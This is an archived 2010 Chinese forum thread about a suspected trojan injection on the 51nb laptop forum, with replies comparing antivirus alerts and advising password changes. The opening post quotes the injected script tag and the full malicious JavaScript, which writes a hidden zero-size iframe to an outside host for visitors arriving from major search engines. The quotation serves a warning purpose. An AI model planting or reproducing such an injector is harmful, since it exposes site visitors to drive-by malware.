如果51nb网站没被挂木马这句代码是什么意思?木马清除掉了,但是 ?

13236608421 发表于 2010-6-24 09:55

如果你们网站没被挂木马

<script src=http://union.7pk.com/tmp/51nb.gif?¨></script>

这句代码是什么意思?

广告挂多了?

查看办法
查看网页原文件

请各位尽快杀毒如果杀毒软件没有报错尽快更换杀毒软件

尽快修改各种密码或临时挂失各种账户

推荐管理员尽快暂停网站

损失几天广告费无所谓

用户损失几百万可就赔不起啦

最奇怪的是论坛的版主居然公开场合发布如何关闭安全软件提示本论坛有病毒木马
莫非是有意挂木马?
http://www.ibmnb.com/thread-970042-1-1.html

不良代码具体内容如下:

var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".google.com.hk");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".sogou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".soso.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".gougou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".118114.cn");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".bing.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".youdao.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".yahoo.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}

[ Edited by13236608421 on 2010-6-24 14:34 ]

oxygen427 发表于 2010-6-24 09:56

小红伞也在包

biclei 发表于 2010-6-24 10:01

jin_xiao2002 发表于 2010-6-24 10:03

我是昨天起360就喊个不停

jin_xiao2002 发表于 2010-6-24 10:03

我是昨天起360就喊个不停

十四郎 发表于 2010-6-24 10:09

microsoft45.8866.org:6677/g/index.html

什么广告啊！

daysin116 发表于 2010-6-24 11:14

卡巴没反应。。。。汗。。

qitaobfsu 发表于 2010-6-24 11:30

这种木马会有什么危害啊？？？？

luckyfly 发表于 2010-6-24 11:42

卡巴正常

qmp198596 发表于 2010-6-24 11:48

软件是死的只凭借一些代码和字符判断人是活的别太相信软件的检测

energyhanyun 发表于 2010-6-24 11:50

我在csdn:o

yjzh013 发表于 2010-6-24 12:03

请各位尽快杀毒如果杀毒软件没有报错尽快更换杀毒软件

尽快修改各种密码或临时挂失各种账户

推荐管理员尽快暂停网站

损失几天广告费无所谓

用户损失几百万可就赔不起啦

这句太恐怖。。。。。。。。。。我。。。。。。。。。。。。。。。很多要改。。。。。。。。。。

弯道之王 发表于 2010-6-24 12:07

闲聊发表于 2010-6-24 12:13

强烈关注。。。

8610 发表于 2010-6-24 12:16

楼主真能联想，zhangyongtao只不过是个退休版主而已。。。。

hjj333 发表于 2010-6-24 12:18

360全套正常

hjiou 发表于 2010-6-24 12:19

360已经卸载掉，乱报病毒
烦得很

richard1147 发表于 2010-6-24 12:19

Symantec AntiVirus 没有任何反应。

ljflovewyn 发表于 2010-6-24 12:20

为什么一张图发好几遍呢

elroy1568 发表于 2010-6-24 12:34

我是今天chrome 报接着opera上的时候MSE报了估计这次问题来了不像上次那样了

zyq 发表于 2010-6-24 12:37

360就是一个垃圾软件，现在正在去往流氓软件的路上

cristo 发表于 2010-6-24 12:38

UBUNTU...爱挂就挂..无视

caeser2 发表于 2010-6-24 12:42

认真分析代码的没有几个人。。。

alanfly 发表于 2010-6-24 12:48

其实昨天第一个发现的仁兄用的是avg，不过帖子被删了。

x41t2008 发表于 2010-6-24 12:50

后果是什么这个是关键，

q73139 发表于 2010-6-24 12:52

nod32+firefox，没有报。

elroy1568 发表于 2010-6-24 13:01

现在为了安全起见还是在沙盒中用浏览器上51

zahirll 发表于 2010-6-24 13:05

13236608421 发表于 2010-6-24 13:16

Posted by alanfly on 2010-6-24 12:48 http://www.ibmnb.com/images/common/back.gif
其实昨天第一个发现的仁兄用的是avg，不过帖子被删了。

问题是我的帖子也被删啦
且头像改成与论坛同名啦

给这破论坛提意见又删除我帖子又换我头像?
http://www.ibmnb.com/customavatars/232812.jpg
是不是这论坛管理层也被黑啦?
乱七八糟的
http://www.ibmnb.com/thread-970205-1-1.html

dawensger 发表于 2010-6-24 13:24

我用ChromePlus 加 Ad Muncher，整个世界都清静了

页: [1] 2 3

专门网's Archiver

如果51nb网站没被挂木马 这句代码是什么意思?木马清除掉了,但是 ?

如果51nb网站没被挂木马这句代码是什么意思?木马清除掉了,但是 ?